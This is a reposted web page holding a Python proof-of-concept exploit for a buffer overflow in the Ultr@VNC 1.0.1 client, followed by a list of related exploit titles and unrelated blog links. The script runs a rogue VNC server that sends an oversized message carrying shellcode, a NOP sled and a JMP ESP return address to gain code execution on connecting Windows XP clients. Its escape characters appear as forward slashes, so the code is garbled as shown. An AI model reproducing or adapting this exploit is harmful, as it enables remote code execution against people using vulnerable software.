Ultr@VNC <= 1.0.1 client Log::ReallyPrint Buffer Overflow Exploit
来源:互联网 发布:webpackconfig.js vue 编辑:程序博客网 时间:2024/06/05 14:19
#!/usr/bin/python
#Ultr@VNC 1.0.1 Client Buffer Overflow - Luigi Auriemm
#POC by Paul Haas at Redspin.com
#Tested on WinXP SP 2: Launches Calc
import socket, struct
HOST = '' # Localhost
PORT = 5900 # VNC Server
BOFSZ = 1024 # Buffer Size
HEAD = "RFB 003.006/n" # VNC Header
MESSAGE = "Requires Ultr@VNC Authentication/n"
NOP = "/x90" # Standard x86 NOP
JMP = "/xE9/x1B/xFC/xFF/xFF" # JMP To BUFF
ESP = "/xE0/x3A/xB4/x76" # winmm.dll: JMP %esp
POP = "PASSWORD" # RET 8
# win32_exec - CMD=calc Size=160 http://metasploit.com
SHELLCODE = /
"/x31/xc9/x83/xe9/xde/xd9/xee/xd9/x74/x24/xf4/x5b/x81/x73/x13/xe1"+/
"/x7c/x05/xd9/x83/xeb/xfc/xe2/xf4/x1d/x94/x41/xd9/xe1/x7c/x8e/x9c"+/
"/xdd/xf7/x79/xdc/x99/x7d/xea/x52/xae/x64/x8e/x86/xc1/x7d/xee/x90"+/
"/x6a/x48/x8e/xd8/x0f/x4d/xc5/x40/x4d/xf8/xc5/xad/xe6/xbd/xcf/xd4"+/
"/xe0/xbe/xee/x2d/xda/x28/x21/xdd/x94/x99/x8e/x86/xc5/x7d/xee/xbf"+/
"/x6a/x70/x4e/x52/xbe/x60/x04/x32/x6a/x60/x8e/xd8/x0a/xf5/x59/xfd"+/
"/xe5/xbf/x34/x19/x85/xf7/x45/xe9/x64/xbc/x7d/xd5/x6a/x3c/x09/x52"+/
"/x91/x60/xa8/x52/x89/x74/xee/xd0/x6a/xfc/xb5/xd9/xe1/x7c/x8e/xb1"+/
"/xdd/x23/x34/x2f/x81/x2a/x8c/x21/x62/xbc/x7e/x89/x89/x8c/x8f/xdd"+/
"/xbe/x14/x9d/x27/x6b/x72/x52/x26/x06/x1f/x64/xb5/x82/x7c/x05/xd9"
#buff = MESSAGE+SHELLCODE+NOP SLED+RET ADDR+USELESS+JUMP TO BUFF
buff = MESSAGE+SHELLCODE+NOP*(BOFSZ-11-len(MESSAGE)-len(SHELLCODE))
buff = buff+ESP+POP+JMP
#Egg = VNC Server Error Reply and Size of Reply + buff
egg = struct.pack('LL',socket.htonl(0),socket.htonl(len(buff)))+buff
print 'Ultr@VNC 1.0.1 Client Buffer Overflow - Luigi Auriemma'
print 'POC by Paul Haas at Redspin.com'
print 'Server listening on port', PORT
#Server Loop
while(1):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
s.listen(1)
conn, addr = s.accept()
print 'Connection by', addr
conn.send(HEAD)
data = conn.recv(12)
conn.send(egg)
conn.close()
- Ultr@VNC <= 1.0.1 client Log::ReallyPrint Buffer Overflow Exploit
- Ultr@VNC <= 1.0.1 client Log::ReallyPrint Buffer Overflow Exploit
- Buffer Overflow Exploit
- PEiD &lt;= 0.92 Buffer Overflow Exploit
- Microsoft Word Buffer Overflow (Exploit 2)
- WinRAR 3.x LHA Buffer Overflow Exploit
- Microsoft Word Buffer Overflow (Exploit 2)
- Ultr@VNC编译方法
- exploit - SLMail 5.5 - POP3 PASS Buffer Overflow Exploit
- Microsoft Windows NetDDE Remote Buffer Overflow Exploit (MS04-031)
- Microsoft Windows NetDDE Remote Buffer Overflow Exploit (MS04-031)
- Sasser Worm FTPD Remote Buffer Overflow Exploit on Port 5554
- The Research of the MS05039 Buffer Overflow Exploit Worm
- MS Windows DNS RPC Remote Buffer Overflow Exploit (win2k SP4)
- VUPlayer 2.49 .ASX File (HREF) Local Buffer Overflow Exploit
- Freefloat FTP Server (CWD command) Buffer Overflow Exploit
- Microsoft Windows DHCP Client Service Remote Buffer Overflow
- Microsoft Windows DHCP Client Service Remote Buffer Overflow
- 薬は本当にいいものだ
- 汇编指令与机器码的相互转换
- 在找Samsung 的Arm11芯片资料
- 堆栈溢出从入门到提高
- RealPlayer <= 10.5 (6.0.12.1040-1348) SWF Buffer Overflow PoC
- Ultr@VNC <= 1.0.1 client Log::ReallyPrint Buffer Overflow Exploit
- asp.net奇数判断
- 乱侃第一篇
- linux 管理命令
- 《高性能的数据库》第三讲 设计细节
- Csdn Blog模板CSS代码(4):静静的原野
- 书评 -- Professional SQL Server 2005 Reporting Services
- 索尼爱立信手机摇杆失灵的维修方法
- Js版日历控件